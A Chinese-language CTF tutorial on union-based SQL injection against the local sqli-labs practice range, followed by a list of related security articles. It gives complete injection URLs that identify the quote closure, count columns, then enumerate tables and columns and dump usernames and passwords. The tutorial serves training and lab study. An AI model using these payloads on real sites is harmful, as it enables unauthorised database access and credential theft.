CTF-Web安全--SQL注入之Union注入详解

简介: CTF-Web安全--SQL注入之Union注入详解

一、测试靶场与使用工具

浏览器:火狐浏览器--Firefox

靶场:sqli-labs

使用插件:HackBar

操作环境:phpstudy


二、判断字符型注入与数字型注入

操作步骤:

1、用F12打开控制台,打开HackBar, Loar URL,将当前靶场的URL信息复制到操作台上

2、输入?id=1,观察到页面发生变化,显示的是id=1时数据库中的信息,?是用来分割URL和查询字符串的,查询到了id=1时的用户登录名与登录密码

3、目前还不确定是字符型注入还是数字型注入,我们将id分别改为 id=2 和 id=2-1,若为数字型注入,则 id=2-1 时,页面应与 id=1 时的页面一致,若不一致,则证明为 字符型注入

id=2时:

id=2-1时:

由观察上图可知:id=2-1时页面与id=2时页面一致,与id=1时页面不一致,说明为字符型注入。若id=2-1的页面与id=1时的界面相同,则说明为数字型注入。


三、找到字符型的闭合方式

字符型闭合方式分为四种:'   ``   ')   ")

经过尝试之后我们可以找到符合要求的字符型闭合方式,并在后加上 --+,否则会报错。

http://localhost/Less-1/?id=1' --+

四、正式开始Union注入


--- 共分为五个步骤:

1、找到注入点

2、判断是 字符型注入 \ 数字型注入

3、若是字符型注入,找到它的闭合方式

4、判断查询列数 group by \ order by

5、查找回显位置 令 id=-1 \ id=0


--- 判断查询列数

使用 group by 语句,先令 group by 10, 若不符合条件,则利用二分逼近的方法,逼出最终的答案。

当group by 10时,页面黄字提示报错

经过二分逼近,最终得出结论,查询列数=3


--- 查找回显位置

使用如下语句:

http://localhost/Less-1/?id=-1' union select 1,2,3 --+

为什么要将id改为-1:若id=1,那么页面将显示表中第一行数据,只有id的值在表中不存在,那么页面中将显示我们自己要查询的值,借此我们可以找到回显位。


--- 注入命令,盗取账号和密码

1、首先使用database()函数,借助回显位可以看到当前使用的数据库名称为 'security'。

2、利用SELECT查询语句,查询数据库security中的表都有哪些。

查询过程中要使用 group_concat()函数,否则只会显示一个表名的信息。

http://localhost/Less-1/?id=-1' union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=database() --+

3、利用SELECT查询语句,查询 表User 中的列 column 都有哪些。

http://localhost/Less-1/?id=-1' union select 1,2, group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+

观察到 表User 由三列构成  -- id -- username -- password, 我们的目标就是拿到用户的 username 和 password。

4、利用SELECT查询语句 将用户的 username 和 password 显示到 回显位上。

http://localhost/Less-1/?id=-1' union select 1,2, group_concat(username, '~', password) from users --+

得到用户名与密码,目的达成。


五、若为数字型注入

若注入方式为数字型注入,则不必找到它的闭合方式 与 --+,其他步骤 = 字符型注入。

相关文章
|
8月前
|
Web App开发 监控 安全
OSS客户端签名直传实践:Web端安全上传TB级文件方案(含STS临时授权)
本文深入解析了客户端直传技术,涵盖架构设计、安全机制、性能优化等方面。通过STS临时凭证与分片上传实现高效安全的文件传输,显著降低服务端负载与上传耗时,提升系统稳定性与用户体验。
806 2
|
4月前
|
安全 Linux iOS开发
Burp Suite Professional 2025.10 发布 - Web 应用安全、测试和扫描
Burp Suite Professional 2025.10 (macOS, Linux, Windows) - Web 应用安全、测试和扫描
376 3
|
5月前
|
安全 Linux iOS开发
Burp Suite Professional 2025.9 发布 - Web 应用安全、测试和扫描
Burp Suite Professional 2025.9 (macOS, Linux, Windows) - Web 应用安全、测试和扫描
501 0
Burp Suite Professional 2025.9 发布 - Web 应用安全、测试和扫描
|
7月前
|
安全 Linux iOS开发
Burp Suite Professional 2025.7 (macOS, Linux, Windows) - Web 应用安全、测试和扫描
Burp Suite Professional 2025.7 (macOS, Linux, Windows) - Web 应用安全、测试和扫描
663 0
Burp Suite Professional 2025.7 (macOS, Linux, Windows) - Web 应用安全、测试和扫描
|
7月前
|
存储 安全 JavaScript
Web Storage有哪些安全风险?
Web Storage有哪些安全风险?
|
7月前
|
SQL 数据格式
SQL 无法使用Union如何解决
SQL Server中使用UNION时,若字段含ntext类型会报错。可通过查询INFORMATION_SCHEMA.COLUMNS定位该字段,并用CAST转为nvarchar即可解决。
|
10月前
|
安全 Linux API
Burp Suite Professional 2025.4 发布 - Web 应用安全、测试和扫描
Burp Suite Professional 2025.4 (macOS, Linux, Windows) - Web 应用安全、测试和扫描
457 6
Burp Suite Professional 2025.4 发布 - Web 应用安全、测试和扫描
|
人工智能 Linux iOS开发
Burp Suite Professional 2025.2 (macOS, Linux, Windows) - Web 应用安全、测试和扫描
Burp Suite Professional 2025.2 (macOS, Linux, Windows) - Web 应用安全、测试和扫描
627 12
Burp Suite Professional 2025.2 (macOS, Linux, Windows) - Web 应用安全、测试和扫描
|
11月前
|
安全 大数据 数据挖掘
课时9:阿里云Web应用防火墙:全面保障网站的安全与可用性
阿里云Web应用防火墙(WAF)基于阿里巴巴十年攻防经验,提供全面的网站安全防护。它通过Web应用防护、CC攻击防护和业务风控,有效应对各类网络威胁,确保网站的安全与可用性。智能双引擎技术降低误报率,实时数据分析和虚拟补丁更新保障系统安全。WAF已成功护航多个重大活动,为企业提供高效、简便的安全解决方案。
345 0
|
缓存 安全 搜索推荐
阿里云先知安全沙龙(北京站) ——浅谈Web快速打点
信息收集是网络安全中的重要环节,常用工具如Hunter、Fofa和扫描工具可帮助全面了解目标系统的网络结构与潜在漏洞。遇到默认Nginx或Tomcat 404页面时,可通过扫路径、域名模糊测试、搜索引擎缓存等手段获取更多信息。AllIN工具(GitHub: P1-Team/AllIN)能高效扫描网站路径,发现敏感信息。漏洞利用则需充分准备,以应对突发情况,确保快速拿下目标站点。 简介:信息收集与漏洞利用是网络安全的两大关键步骤。通过多种工具和技术手段,安全人员可以全面了解目标系统,发现潜在漏洞,并制定有效的防御和攻击策略。